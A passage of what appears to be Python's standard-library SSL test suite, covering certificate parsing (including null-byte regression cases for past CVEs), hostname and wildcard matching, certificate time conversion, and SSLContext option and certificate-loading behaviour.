p = ssl._ssl._test_decode_cert(TALOS_INVALID_CRLDP)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(
p,
{
'issuer': (
(('countryName', 'UK'),), (('commonName', 'cody-ca'),)),
'notAfter': 'Jun 14 18:00:58 2028 GMT',
'notBefore': 'Jun 18 18:00:58 2018 GMT',
'serialNumber': '02',
'subject': ((('countryName', 'UK'),),
(('commonName',
'codenomicon-vm-2.test.lal.cisco.com'),)),
'subjectAltName': (
('DNS', 'codenomicon-vm-2.test.lal.cisco.com'),),
'version': 3
}
)
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1\n'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, (int, long))
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = ssl.wrap_socket(s)
wr = weakref.ref(ss)
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# socket.error raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s)) as ss:
self.assertRaises(socket.error, ss.recv, 1)
self.assertRaises(socket.error, ss.recv_into, bytearray(b'x'))
self.assertRaises(socket.error, ss.recvfrom, 1)
self.assertRaises(socket.error, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(socket.error, ss.send, b'x')
self.assertRaises(socket.error, ss.sendto, b'x', ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.dup)
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with closing(ssl.wrap_socket(s)) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors(self):
sock = socket.socket()
self.assertRaisesRegexp(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegexp(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegexp(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with closing(ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE)) as s:
self.assertRaisesRegexp(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(IOError) as cm:
with closing(socket.socket()) as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(IOError) as cm:
with closing(socket.socket()) as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(IOError) as cm:
with closing(socket.socket()) as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match one left-most wildcard
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = u'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = u'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, u'www.pythön.org'.encode("idna").decode("ascii"))
ok(cert, u'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, u'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, u'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.com'),),)}
ok(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b.co*'),),)}
fail(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b*.com'),),)}
with self.assertRaises(ssl.CertificateError) as cm:
ssl.match_hostname(cert, 'axxbxxc.com')
self.assertIn("too many wildcards", str(cm.exception))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with closing(socket.socket()) as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s)) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s)) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s, server_side=True, certfile=CERTFILE)) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegexp(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegexp(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatement for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
self.assertRaises(TypeError, ssl.SSLContext)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegexp(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
OP_ENABLE_MIDDLEBOX_COMPAT)
self.assertEqual(default, ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(IOError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaisesRegexp(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegexp(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegexp(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegexp(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegexp(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegexp(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
ctx.load_verify_locations(cafile=BYTES_CERTFILE.decode('utf-8'))
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(IOError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(IOError):
ctx.load_verify_locations(u'')
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read().decode("ascii")
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read().decode("ascii")
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
